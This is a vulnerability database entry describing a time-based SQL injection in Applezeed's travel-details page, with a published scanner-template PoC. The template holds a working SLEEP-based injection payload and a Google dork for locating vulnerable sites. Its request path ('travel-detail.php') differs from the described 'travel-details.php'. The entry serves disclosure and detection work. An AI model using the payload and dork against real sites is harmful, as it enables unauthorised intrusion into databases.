applezeed-sqli: Applezeed - SQL Injection

日期: 2025-08-01 | 影响软件: Applezeed | POC: 已公开

漏洞描述

Applezeed's 'travel-details.php?id=' URL with possible time-based SQL injection (SQLi) vulnerability allows attackers to manipulate the 'id' parameter, potentially causing delays in SQL queries and unauthorized retrieval of travel information from the database

PoC代码[已公开]

id: applezeed-sqli

info:
  name: Applezeed - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    Applezeed's 'travel-details.php?id=' URL with possible time-based SQL injection (SQLi) vulnerability allows attackers to manipulate the 'id' parameter, potentially causing delays in SQL queries and unauthorized retrieval of travel information from the database
  reference:
    - https://cxsecurity.com/issue/WLB-2019120057
  metadata:
    verified: true
    max-request: 1
    google-query: intext:"Power BY applezeed.com"
  tags: time-based-sqli,sqli,unauth,applezeed,vuln

http:
  - raw:
      - |
        @timeout: 15s
        GET /travel-detail.php?id=1%27AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(6)))bAKL)%20AND%20%27vRxe%27=%27vRxe HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "applezeed")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402203ba7b37315b283feab4f0ec7e459bbdbd23bb7216fee89a011fc2f2de7f13f3102207b43091a4113df906200fb4304f03dabcb148c67c1f3ab78508b857a099582a1:922c64590222798bb761d5b6d8e72950

相关漏洞推荐